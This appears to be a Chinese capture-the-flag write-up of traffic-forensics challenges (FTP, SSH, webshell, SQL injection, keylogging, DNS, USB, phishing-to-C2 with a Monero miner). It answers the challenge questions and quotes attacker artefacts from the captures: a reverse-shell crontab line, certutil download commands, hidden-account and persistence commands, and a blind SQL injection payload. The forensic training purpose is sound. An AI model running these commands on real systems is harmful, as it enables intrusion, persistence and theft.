好靶场古法赛道-流量分析
流量分析
FTP流量分析
首先netA现分析一波,直接分析出了登入的用户密码,还有导出的文件,
接下来分析流量包
1.提交攻击者 IP
过滤ftp流量之后
统计->会话->IPv4
攻击者ip是192.168.39.88,受害者ip为192.168.39.90.
2.攻击者对哪个网段进行了存活探测?发现了多少台存活主机?
统计->端点->IPv4
如图存在一个局域网``,内网地址是
1 | 192.168.39.1 |
广播地址为192.168.39.255,网络网安设备192.168.39.254,192.168.39.1。剩余7个
答案为192.168.39.0/24,7
3.受害服务器开放了哪些常见端口?
攻击者存在端口扫描行为,查看开放端口过滤语法为
1 | ip.src==192.168.39.90 && ip.dst==192.168.39.88 && tcp.flags.syn==1 && tcp.flags.ack==1 |
SYN+ACK = 端口开放
常见的端口有
21,135,139,445,5985
4.受害服务器的 FTP 服务软件和版本是什么?
直接过滤ftp流量
FileZilla Server 0.9.60 beta
5.攻击者在暴力破解前使用 Nmap 脚本探测了 FTP 匿名登录,尝试的用户名是什么?
第一次尝试的用户名是anonymous
6.攻击者使用了什么工具进行暴力破解?
常见的密码爆破就是Hydra
7.暴力破解的目标用户名和成功密码分别是什么?
netA一把梭
ftpuser/ftp@2026
8.暴力破解共尝试了多少个密码?产生了多少次登录失败?
这一题有点坑,刚开始以为是总共尝试了多少次,发现不对就卡了好久
1 | ftp.request.command=="PASS" |
这里密码登入一共有36条流量,
这4条是手工探测,不属于暴力破解,同时在密码中有
这个在暴力破解的范畴但是重复了,总共是36-4-2=30,
上图密码成功登入3次,失败次数就是36-3=33
答案30,33
9.攻击者登录后浏览了哪些目录?
cwd为切换目录,答案为人事档案,财务报表,运维文档,项目投标
10.攻击者一共下载了几个文件?列出全部文件名。
答案为5|README.txt,华章科技-2026年6月薪资明细.pdf,华章科技-2026年Q2财务报告.pdf,华章科技-内部系统凭据清单.pdf,华章科技-山东政务项目投标方案.pdf
在wireshark中也能直接看到
11攻击者下载 PDF 前切换了什么传输模式?
每一次下载pdf都会执行TYPE I,是二进制传输模式,虽然知道是这个,但是答案也是试了很久是 BINARY
12被窃取的财务报告中,公司 Q2 总营收是多少?
导出pdf直接看就行8743.2
13被窃取的薪资表中,CEO 王建国的月薪总额是多少?
14凭据文件中生产环境数据库主库的密码是什么?
PgMaster#2026db
15投标文件中该项目的投标总价是多少?
2350
16被窃取的文件中隐藏的 flag 是什么?
在华章科技-内部系统凭据清单
flag{420E8A8C540D4BE07F0221F46CCFB8EE}
SSH流量分析
1.攻击者的 IP 地址是什么?
过滤ssh流量
发现大部分都是192.168.11.129和192.168.11.96之间的流量,客户端肯定就是攻击者,ip就是192.168.11.129
2.受害服务器的 IP 地址是什么?
同上受害者ip就是192.168.11.96
3.攻击者对目标网段进行了存活主机探测,请写出扫描的网段。
统计->端点
已经知道了受害者ip,网段就是192.168.11.0/24
4.攻击者存活主机探测使用了什么协议?共发现多少台存活主机?
统计->协议分级
可以看到存在ARP和ICMP流量,过滤ARP流量
在断点统计中在目标网段的ip一共有6个,这里是算上192.168.11.1
ARP-6
5.受害服务器开放了哪些端口?
1 | ip.src==192.168.11.96&& ip.dst==192.168.11.129 && tcp.flags.syn==1 && tcp.flags.ack==1 |
端口有22,80,443
或者netA,端口统计
6.攻击者使用了什么工具进行 SSH 暴力破解?(写出工具名称和 SSH 客户端标识)
1 | ssh&&ip.src==192.168.11.129&&ip.dst==192.168.11.96 |
libssh 是暴力破解工具Hydra 的底层依赖库,同时存在毫秒级批量新建完整 SSH 握手流程,因此是使用Hydra爆破
Hydra-SSH-2.0-libssh_0.11.3
7.受害服务器的 SSH 服务版本是什么?
SSH-2.0-OpenSSH_10.0p2 Ubuntu-5ubuntu5.4
8.攻击者暴力破解共尝试了多少次密码?
这一题应该有问题,答案是30
具体参考https://mp.weixin.qq.com/s/xYR3dYtFIfakpCHgnVwyBQ
9.攻击者暴力破解成功后登录的用户名是什么?
用户名为sanjiu
10.攻击者进入反弹 Shell 后执行的第一条命令是什么?
第一条命令为whoami
11攻击者一共建立了几次反弹 Shell 连接?
一共2次
12受害服务器的主机名是什么?
sanjiu@sanjiu-VMware-Virtual-Platform:~$
主机名为sanjiu-VMware-Virtual-Platform
13.攻击者手动登录时使用的 SSH 客户端标识是什么?
tcp流1058中有登入时使用的标识
SSH-2.0-OpenSSH_10.2p1 Debian-3
14.反弹 Shell 使用的端口号是什么?
在上面统计时就知道攻击者开放了4444端口
既然是反弹shell那就过滤一下
1 | ip.src==192.168.11.96&&ip.dst==192.168.11.129 |
可以看到监听的端口是4444,这里容易误把写入定时任务的9999端口当作答案,实际要看流量
15反弹 Shell 的连接方向是什么?(谁主动连接谁)
192.168.11.96–>192.168.11.129:4444
16攻击者将 root 密码修改为了什么?
sanjiu@@@123
17.攻击者创建的影子账户用户名和 UID 分别是什么?
sanJiu-0
18攻击者写入的 Crontab 后门完整内容是什么?
*/10 * * * * root bash -i >& /dev/tcp/192.168.11.129/9999 0>&1
19.攻击者 Crontab 后门的回连端口是什么?
9999
20.攻击者在受害机上创建的隐藏后门脚本完整路径是什么?
分步写后面文件,路径/tmp/.backdoor.sh
21.攻击者写入 SSH 公钥后门的公钥文件完整路径是什么?
路径为 /root/.ssh/authorized_keys
22.受害机 /etc/shadow 文件中 root 用户的密码哈希值是什么?
$y$j9T$HAiWkWk/MXH2ZeZDj9uXl1$jr4kDa9qVoVGC9kJb2U7tK7nHRcWQA/VdB6OoMl8d6C
WebShell3
1.提交攻击者 IP 地址。
统计->会话
这两个ip会话数据最多,可以判断为攻击者和受害者,攻击者192.168.99.28
2.提交受害服务器 IP 地址。
同上,受害者192.168.99.59
3.攻击者使用什么工具进行了内网资产探测?
在tcp5514找了fscan
4.攻击者内网扫描了哪些存活主机 IP?(从小到大,逗号分隔)
过滤icmp流量
除去攻击者本身的ip,最后答案为
192.168.99.58,192.168.99.59,192.168.99.60,192.168.99.61,192.168.99.62,192.168.99.128,192.168.99.254
5.受害服务器开放了哪些端口?(从小到大,逗号分隔)
net一把梭或者
1 | ip.src == 192.168.99.59 && tcp.flags.syn == 1 && tcp.flags.ack == 1 |
80,135,139,445,3306,3389,5985
6.受害服务器 Web 中间件及版本是什么?
webshell流量直接过滤看post请求流量,追流看一下
nginx/1.15.11
7.受害服务器使用的 WordPress 主题名称和版本号是什么?
tcp5074
使用的是WebStack-1.2024
答案 WebStack 1.2024
8.攻击者利用了哪个 CVE 漏洞?
直接搜索一下资料就行
CVE-2026-1555
9.攻击者漏洞利用的完整请求路径(含参数)是什么?
/wp-admin/admin-ajax.php?action=img_upload
10.攻击者上传 Webshell 时使用的客户端工具是什么?
如上图 curl/8.5.0
11.攻击者上传的 Webshell 原始文件名是什么?
tcp流5251,上传的源文件为web.php
12.攻击者上传的 Webshell 在服务器上的完整 URL 是什么?
要是完整的http://192.168.99.59/wp-content/uploads/2026/06/20260617192508_4dc56fd5.php
13.攻击者使用的 Webshell 管理工具是什么?
上图代码就是哥斯拉,而且下面也说了哥斯拉的连接密钥,webshell管理工具就是Gobzilla
14.该工具使用的加密方式是什么?
netA一把梭
PHP_XOR_RAW
15.哥斯拉的连接密钥是什么?
1 | <?php |
连接密钥是key,不是3c6e0b8a9c15224a
16.受害服务器有多少张网卡?
接下来就是解密哥斯拉流量,tcp流5271,修改显示为原始数据
解密请求数据,配置如图
在响应数据包中,没有换行,可以看0d0a这个可以看作为换行符,两个0d0a之间的数据就是返回数据
根据返回数据,一共有4个网卡
17.受害服务器的主机名是什么?
继续往下看就行了,tcp流5272攻击者执行了
响应数据
WIN-5CNHCFAIMP9
18.攻击者通过 Webshell 读取了 WordPress 配置文件,数据库用户名和密码分别是什么?
后面就是一直看流量解密就行了,在tcp5276,攻击者执行了type E:\phpstudy_pro\WWW\wp-config.php
响应数据如下
wordpress/123456
19.攻击者创建的隐藏后门账户完整用户名是什么?
tcp流5280攻击者执行了net user AdminJIU$ Admin@12345! /add
隐藏用户名为AdminJIU$
20.该后门账户的密码是什么?
密码是Admin@12345!
21.攻击者上传的伪装成系统服务的后门脚本文件名是什么?
tcp流5284中攻击者执行了
1 | schtasks /create /sc minute /mo 10 /tn "Microsoft\Windows\WindowsDefender\SecurityHealthCheck-flag{65180BB0B2A30D0160488C1A997A470A}" /tr "C:\Windows\System32\WinDefenderHealthCheck.bat" /ru SYSTEM /f |
伪装的后门脚本为WinDefenderHealthCheck.bat
22.该后门脚本的回连地址是什么?
1 | certutil -urlcache -split -f "[http://192.168.99.28:8080/microsoftUpdate/healthcheck.dat](https://link.wtturl.cn/?target=http%3A%2F%2F192.168.99.28%3A8080%2FmicrosoftUpdate%2Fhealthcheck.dat&scene=im&aid=497858&lang=zh)" "%TEMP%\health.dat" >nul 2>&1 |
这里要填完整的地址http://192.168.99.28:8080/microsoftUpdate/healthcheck.dat
23.攻击者后门脚本使用什么 Windows 工具下载回连载荷?
同上使用的工具是certutil
24.攻击者创建的计划任务后门中隐藏的 flag 是什么?
上面分析过了是flag{65180BB0B2A30D0160488C1A997A470A}
25.攻击者在 RDP 会话中使用 certutil 下载的两个伪装恶意文件原始文件名是什么?
攻击者通过RDP下载文件,那么过滤一下流量
1 | ip.src==192.168.99.59&&ip.dst==192.168.99.28&&http |
从受害者->攻击者的流量,其中有两个文件
/%E5%8E%9F%E7%A5%9E.exe
/%E6%A4%8D%E7%89%A9%E5%A4%A7%E6%88%98%E5%83%B5%E5%B0%B8%E6%9D%82%E4%BA%A4%E7%89%88v2.1%E5%AE%89%E8%A3%85%E5%8C%85.exe
分别解码就是
原神.exe
植物大战僵尸杂交版v2.1安装包.exe
原神.exe-植物大战僵尸杂交版v2.1安装包.exe
26.攻击者下载恶意文件使用的 HTTP 服务是什么?
tcp流5519,
http服务就是SimpleHTTP/0.6 Python/3.12.0
分析完太不容易了,考察的真是太细了
SQL注入流量分析
1.提交攻击者 IP。
依旧统计->会话
192.168.9.25
2.攻击者使用了什么工具进行攻击?提交工具名称和版本。
后面的注入流量User-Agent有答案
3.攻击者针对哪个参数进行了注入?
同上,参数为category
4.该注入使用了什么数据库函数?
看流量,在注入过程中使用了
5.攻击者枚举出数据库中共有几张表?
这个就是看攻击流量,攻击者存在爆破表数量得行为,
1 | http.request.uri contains "tablename" |
tcp471-479存在爆破数量行为,tcp流474爆破语句为
1 | category=test' AND 3448=(CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(tablename) AS VARCHAR(10000))::text,(CHR(32))) FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))::text FROM 1 FOR 1))!=53) THEN (SELECT 3448 FROM PG_SLEEP(1)) ELSE 3448 END) AND 'Giyc'='Giyc |
判断表得数量第一个字符是否是5,后续流量是判断数量的第二个字符,发现没有第二个字符,然后开始爆破第一个表名得第一个字符证明表的数量就是5
6.攻击者从哪张表中获取了 flag?提交表名。
上面说到后续全部都是逐字符爆破5个表得表名,在不使用ai得前提下这个工作量是非常巨大的,这个流量太多了,netA也不好使
这里可以过滤http流量从后往前跳着看,然后就可以找到
1 | test' AND 3915=(CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(flag_value AS VARCHAR(10000))::text,(CHR(32))) FROM public.secret_flag ORDER BY id OFFSET 0 LIMIT 1)::text FROM 16 FOR 1))>60) THEN (SELECT 3915 FROM PG_SLEEP(1)) ELSE 3915 END) AND 'xcwG'='xcwG |
找打爆破flag得流量,表名就是secret_flag,字段就是flag_value
7.提交 flag。
过滤流量
1 | http.request.uri contains "flag_value"&&ip.src==192.168.9.25 |
分析就行了,太多了不想看,放一下yuiiijuk佬得答案
flag{8673db96fa2dceeb}
8.攻击者获取了管理员账户信息,管理员密码是什么?
参考yuiiijuk佬得答案
123456
参考文章https://mp.weixin.qq.com/s/xYR3dYtFIfakpCHgnVwyBQ
键盘取证 —— 爱而不得
1.受害者计算机的登录用户名是什么?
netA一把梭完了,分析处理完就是
1 | wangruoyao<RET>Wr040February!<RET>baobao you yige nande xiangyao zhui wo ,hao fan a !<RET>gen ge biantai shide ,yizhi jiejin wo <RET>haoxiang shi jiao liulu <RET>ni bang wo xiangxiang zenme ban <RET>wo xian shui la !<RET>baobao wanan <GA>baobao <RET>cmd<RET>whoami<RET>ipconfig<RET>net user<RET>net user happy$ woaini yaoyao @20030613 /add<RET>net localgroup administrators happy$ /add<RET>certutil -urlcache -split -f http"//124.223.18.231/gift.exe :C"\Users\wangruoyao\Desktop\songgei yaoyao de liwu -zhiyou yaoyao cai keyi dakai .exe:<RET>copy :C"\Users\wangruoyao\Desktop\songgei *: C"\Windows\Temp\svchost.exe<RET>attrib +h +s C"\Windows\Temp\svchost.exe<RET>reg add :HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run: /v :SystemUpdate: /t REG_SZ /d :C"\Windows\Temp\svchost.exe: /f<RET>schtasks /create /tn :WindowsUpdate: /tr :C"\Windows\Temp\svchost.exe: /sc onlogon /ru System<RET>copy C"\Windows\Temp\svchost.exe :C"\Users\wangruoyao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe:<RET>netsh advfirewall firewall add rule name=:allow_remote: dir=in action=allow protocol=tcp localport=4444<RET>dir C"\Users\wangruoyao\Desktop<RET>type C"\Users\wangruoyao\Desktop\notes.txt<RET>netstat -ano<RET>tasklist<RET>exit<RET> |
主机名是wangruoyao
flag{wangruoyao}
2.受害者的登录密码是什么?
输入完Wr040February!之后还是聊天,登入密码就是Wr040February!
flag{Wr040February!}
3.攻击者”happy”的真实姓名是什么?(提交拼音小写)
1 | haoxiang shi jiao liulu |
好像是叫liulu
flag{liulu}
4.攻击者在受害者计算机上创建的隐藏账户及其密码分别是什么?(密码为中文,需根据拼音还原)
1 | net user happy$ woaini yaoyao @20030613 /add |
账号是happy$,密码是我爱你杳杳@20030613
flag{happy$/我爱你杳杳@20030613}
5.攻击者入侵后执行的第一条系统命令是什么?
分析聊天记录第一条是whoami
flag{whoami}
6.攻击者入侵后执行的最后一条命令是什么?
最后一个是exit
flag{exit}
7.攻击者使用了什么系统自带工具从远程服务器下载恶意程序?
1 | certutil -urlcache -split -f http://124.223.18.231/gift.exe C:\Users\wangruoyao\Desktop\songgei yaoyao de liwu -zhiyou yaoyao cai keyi dakai .exe |
flag{certutil}
8.攻击者下载恶意程序所连接的远程服务器IP地址是什么?
同上
flag{124.223.18.231}
9.攻击者下载到受害者桌面的恶意文件完整文件名是什么?(需根据拼音还原中文)
songgei yaoyao de liwu -zhiyou yaoyao cai keyi dakai .exe
舔狗
flag{送给杳杳的礼物-只有杳杳才可以打开.exe}
10.攻击者写入注册表实现开机自启动的键值名称是什么?
1 | reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SystemUpdate /t REG_SZ /d C:\Windows\Temp\svchost.exe /f |
键名为SystemUpdate
flag{SystemUpdate }
11.攻击者通过防火墙规则开放了哪个本地端口的入站访问?
1 | netsh advfirewall firewall add rule name=:allow_remote: dir=in action=allow protocol=tcp localport=4444 |
flag{4444}
DNS流量
查看dns流量,发现在cdn-analytics.cloud-metric.net域名前有字符串,并且还有编号,一共是00-07
1 | 0085e99f1b7c61 |
拼接一下
1 | 85e99f1b7c61dd5fda41a0860c6169bbbd08a975aaed0b0c3a20563a4f45b571ac53c35940cd6204099463929dd66dd3 |
netA分析出来有一个key,base64解码得到hbc2@kfcfwa2026!
AES-ECB解密
flag{18A55236EC494BA53238DA9613BB9AAE}
USB流量分析
netA一把梭了
上下颠倒即可
flag{a6f70fe34b10419b8d17c7422e3c974a}
色情钓鱼邮件流量
56道题,叁玖佬还是太权威了
1.攻击者使用的操作系统主机名是什么?
这个应该是出题人后面又修改了。开始的答案是flag{192.168.39.88}后面改为flag{kali}了。过滤dhcp流量
2.攻击者的IP地址是多少?
过滤smtp协议
攻击者向受害者发送邮件,攻击者ip为192.168.39.88,邮件服务器ip为192.168.39.138
flag{192.168.39.88}
3.受害者主机一共配置了几个IP地址?请按照从小到大的顺序全部列出。
上面分析到邮件服务器ip为192.168.39.138,受害者与攻击者用的是同一个邮件服务器,那么过滤
1 | ip.src==192.168.39.138&&pop |
看一下客户端拉去邮箱内已存地邮件有几个ip
截图仅为部分ip最后答案为
flag{192.168.39.92,192.168.39.144,192.168.39.150,192.168.39.152}
4.邮件服务器的IP地址和域名分别是什么?(格式:IP_域名)
域名为mail.jiujiu.com
flag{192.168.39.138_mail.jiujiu.com}
5.邮件服务器使用的是什么软件?SMTP 和 POP3 分别使用的端口号是多少?(格式:软件,SMTP端口,POP3端口)
如上图,使用的是Postfix,netA分析端口
Postfix 默认监听 TCP 25
flag{Postfix,25,110}
6.邮件服务器EHLO响应中声明支持哪些传输加密方式?
在EHLO响应中,只有STARTTLS与加密有关
flag{STARTTLS}
7.受害者主机的计算机名是什么?
查看DHCP流量
这里有主机名
flag{WIN-5CNHCFAIMP9}
8.网络中DHCP服务器分配给受害者的默认网关IP是多少?
看DHCP ACK,受害者ip的流量报文
答案是192.168.39.254
9.攻击者使用的钓鱼邮箱地址是什么?
过滤smtp追流看数据
发送方tiantian@jiujiu.com,接收方chenxiaoming@jiujiu.com
flag{tiantian@jiujiu.com}
10.受害者的邮箱地址是什么?
同上flag{chenxiaoming@jiujiu.com}
11.受害者通过POP3协议收取邮件时使用的密码是什么?
过滤pop流量
base64解码结果
chenxiaoming\chenxiaoming123
密码是chengxiaoming123
flag{chenxiaoming123}
12.攻击者 tiantian 在 POP3 登录时使用的密码是什么?
这里要看的pop流量,Destination为192.168.38.88
解码为tiantian/Mail#Jiujiu2026
flag{Mail#Jiujiu2026}
13.在整个攻击过程中,受害机 POP3 总共进行了几次登录?
1 | pop&&(ip.dst==192.168.39.144||ip.dst==192.168.39.92||ip.dst==192.168.39.150||ip.dst==192.168.39.152)&&pop contains "Logged in" |
这里登入的有20条但是答案不是20,是2
14.在整个攻击过程中,攻击者(tiantian)一共向受害者发送了多少封邮件?
还是按照上面的过滤查看受害者登入之后邮箱里有几封邮件,tcp流84
一共有18封邮件
flag{18}
15.攻击者发送的所有邮件中,体积最大的一封邮件大小是多少字节?(SMTP SIZE参数值)
其实在刚才tcp流84中就有各个邮件的大小
最大的是9139917,但是题目要求是以SMTP SIZE参数值为准,
1 | smtp.req.parameter contains "SIZE"&&ip.src==192.168.39.88 |
这里最大就是9139617
flag{9139617}
16.攻击者发送的包含恶意附件”上门服务”的那封邮件,其邮件主题是什么?(解码后的中文)
发送的exe的邮件就拿那个最大的,追流看一下
解码一下
主题是在
1 | Subject: =?UTF-8?B?5L2g55qE5LiK6Zeo5pyN5Yqh5ZOmIQ==?= |
flag{你的上门服务哦!}
17.第一封钓鱼邮件的主题是什么?(解码后的中文)
1 | smtp.req.parameter contains "SIZE"&&ip.src==192.168.39.88 |
流量按照时间排序,第一封邮件是
主题是哥哥
flag{哥哥}
18.攻击者(tiantian)在社工邮件中共向受害者发送了多少张PNG图片?
看攻击者发送的邮件,找到了1.png,2.png,3.png4.png,5.png
flag{5}
19.木马上线后自我复制到哪个路径,伪装成什么系统进程名?
俺不会逆向,土哥给的答案
flag{C:\ProgramData\Microsoft\Windows\WMI\WmiPrvSE.exe,WmiPrvSE.exe}
20.可疑文件”上门服务.exe”的SHA256哈希值是多少?
微步沙箱分析文件
flag{4a9ed2d751acaea3317077bd774c7044bd4e8379dceace0ca8f6e0dee7160656}
21.该恶意样本是基于什么开发框架编译的?
flag{.net}
22.该恶意样本的PE子系统类型是什么?(十六进制值)
Magic 字段:PE32 executable (GUI) Intel 80386 Mono/.Net assembly标注为 GUI 图形界面程序,对应 PE 子系统常量 IMAGE_SUBSYSTEM_WINDOWS_GUI
对应2
flag{0x0002}
23.分析恶意文件,该恶意程序与C2服务器通信时使用的HTTP Content-Type是什么?
这里直接导入密钥文件,tls流量解密,过滤post请求
flag{application/x-www-form-urlencoded}
24.分析恶意文件,该恶意程序忽略TLS证书校验所调用的对象属性全名是什么?
逆向分析这一块就让ai干吧。不会逆向
答案为ServicePointManager.ServerCertificateValidationCallback
不是System.Net.ServicePointManager.ServerCertificateValidationCallback!!!!
flag{ServicePointManager.ServerCertificateValidationCallback}
25.该恶意程序的默认心跳间隔Sleep时间最短为多少毫秒?
这就是逆向分析了,让ai分析的,这个题有点坑
不是正常区间的最小值3000,答案是200,
flag{200}
26.恶意程序回连C2服务器使用的端口号是多少?
flag{8443}
27.木马 C2 备用端口是多少?
这里逆向分析有G..cctor 里初始化了两个端口变量:
_port = 8443_port2 = 4443
备用端口是
flag{4443}
28.C2通信使用的TLS版本和密码套件编号分别是什么?(格式:TLS版本_密码套件十六进制)
过滤tls流量,要查看成功握手的流量
查看Client Hello
Server Hello
flag{0x0303_0xc030}
29.C2通信的JA3指纹值是多少?
过滤tls流量,
flag{43016d7f7f9336b17c884650d0d2545d}
30.使用sslkeys.log解密C2流量后,C2心跳包的POST路径是什么?
解密后过滤post请求
存在固有特征Expect: 100-continue,还有通用UA: Mozilla/5.0,答案为
flag{/s}
31.解密C2流量后,心跳包中上报的机器标识字段内容是什么?(完整的POST body解码后内容)
同上
flag{id=WIN-5CNHCFAIMP9&s=1}
32.木马上线时向 C2 路径 /h 上报的初始信息包含哪些字段和值?(格式:字段1=值,字段2=值,字段3=值)
tcp流381
flag{id=WIN-5CNHCFAIMP9,user=Administrator,os=Microsoft Windows NT 6.2.9200.0}
33.C2结果回传使用的POST路径是什么?
post请求一共有3个路径/s,/r,/h
回传使用的就是/r,追踪流验证一下,tcp236
解码后为win-5cnhcfaimp9\administrator
C2 回传主机身份取证信息
flag{/r}
34.攻击者通过C2在受害主机上执行whoami命令后获取到的完整结果是什么?
tcp235
tcp236包中回显结果
flag{win-5cnhcfaimp9\administrator}
35.C2主机信息上报路径/h中包含了操作系统版本信息,受害者操作系统的完整标识是什么?
tcp流383
flag{Microsoft Windows NT 6.2.9200.0}
36.攻击者通过C2在受害主机上创建了几个隐藏后门账户?分别是什么用户名?
一共有2个
flag{2,yue,yue$}
37.攻击者创建 yue 账户时设置的密码是什么?
tcp268
flag{Aa123456!@}
38.攻击者用什么注册表路径和键值隐藏后门账户。写出完整路径、键名、类型和数值。
tcp流302
1 |
|
路径HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
键名yue$
类型REG_DWORD
数值0
flag{HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,yue$,REG_DWORD,0}
39.受害者的手机号、身份证号和家庭住址分别是什么。(手机号格式:xxx-xxx-xxx)
tcp流90
base64解码
这里面就是受害者的信息,按照题目要求填写即可
flag{138-5710-2026,330106199508151231,浙江省杭州市西湖区文一西路888号星月交响小区5幢2单元801室}
40.木马具备哪些恶意功能,对应 C2 命令字是什么。(格式:flag{命令字:function,命令字:function},按命令字 a-z 排序;短命令按功能归一化,如 c 记为 cam、e 记为 exec、i 记为 info)
这里一共有4个命令字
1.exec
2.info
3.cam
4.sc
这里其实是要结合木马程序分析好一点,需要逆向分析。这里有一个屏幕截图和摄像头截图,单从流量包中分析分析不出哪一个是屏幕截图,哪一个是摄像头,这一题我的理解就到这了,具体详解还有看官方wp。最后答案是
flag{cam:webcam_capture,exec:command_execution,info:system_information,sc:screenshot}
还有一个疑问,为啥最后是sc,而不是screen。
41.木马屏幕截图用了什么 Windows API,图片保存什么格式,传给 C2 前做了什么编码。
这个应该需要逆向分析,根据下面题目提示是用到了 BitBlt ,屏幕截图为
base64解码时jpg图片,最后答案
flag{BitBlt,JPEG,Base64}
42.截图功能中 BitBlt 的 dwRop 光栅操作常量值是什么?(十六进制)
太菜了不会逆向,土哥分析的我也不懂
flag{0xCC0020}
ai分析如下
43.WindowsUpdate.bat创建的计划任务名称是什么?
攻击者执行了
1 | certutil -urlcache -split -f http://192.168.39.88:8888/WindowsUpdate.bat C:\Users\yue\Downloads\WindowsUpdate.bat |
netA分析时
接下来就分析bat文件即可
1 | @echo off |
后面几题就都出来了,本题答案
1 | set "a=WindowsRuntimePlatformUpdate" |
flag{WindowsRuntimePlatformUpdate}
44.该挖矿脚本连接的矿池地址和端口是什么?(格式:地址:端口)
1 | set "b=xmr.cryptonight-hub.com" |
flag{xmr.cryptonight-hub.com:443}
45.该挖矿脚本挖掘的是什么加密货币?
1 | {"algo":null,"coin":"monero","url":"%b%:443","user":"49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ","pass":"RTPlatformSvc","tls":true,"keepalive":true,"daemon":false}]})>"%f%" |
答案在”coin”:”monero”
flag{monero}
46.挖矿脚本使用的挖矿算法是什么?
1 | randomx:{"mode":"auto","1gb-pages":false,"rdmsr":true,"wrmsr":true,"numa":true} |
使用的算法是randomx,后面的是参数
flag{radomx}
47.挖矿程序使用的钱包地址是什么?
“user”:”49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ”
flag{49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ}
48.挖矿配置中的worker密码(pass字段)是什么?
同上,flag{RTPlatformSvc}
49.挖矿脚本将自身和配置文件安装到哪个目录?(使用环境变量表示)
1 | set "d=%APPDATA%\Microsoft\Windows\RuntimePlatform" |
flag{%APPDATA%\Microsoft\Windows\RuntimePlatform}
50.该计划任务设置的执行频率是什么?(每隔多少小时执行一次)
1 | schtasks /create /tn "%a%" /tr "cmd /c %e%" /sc hourly /mo 2 /st 02:00 /f /ru SYSTEM /rl HIGHEST |
·/mo 2`:间隔 2 个小时
flag{2}
51.挖矿脚本使用了什么技术来隐藏自身文件?
bat中大量使用
1 | attrib +h 目标文件/文件夹 |
给文件添加隐藏属性
flag{attrib +h}
52.攻击者通过 C2 下载挖矿脚本时,使用的 Windows 内置下载命令及参数前缀是什么?(格式:flag{命令 参数1 参数2 参数3 参数4})
下载脚本的命令是
1 | certutil -urlcache -split -f http://192.168.39.88:8888/WindowsUpdate.bat C:\Users\yue\Downloads\WindowsUpdate.bat |
flag{certutil -urlcache -split -f}
53.在所有邮件往来中,攻击者用于投递恶意程序的IP地址与C2控制端的IP地址是否是同一个?如果是,该IP是多少?
微步云沙箱分析的恶意程序目的地址为192.168.39.88
与c2控制端一致
flag{192.168.39.88}
54.从邮件投递到C2上线,受害主机发起C2连接的源IP是哪个?
整个过程是192.168.39.152->192.168.39.88之间的通信流量,因此ip为192.168.39.152
flag{192.168.39.152}
55.在C2通信流量中,一共捕获到了多少个心跳包(POST /s请求)?
1 | http.request.method == "POST" && http.request.uri == "/s" |
flag{689}
56.受害者主机名为WIN-5CNHCFAIMP9,该主机使用了多少块网卡?
在tcp246返回了受害机的系统信息
有4个网卡
flag{4}























































































































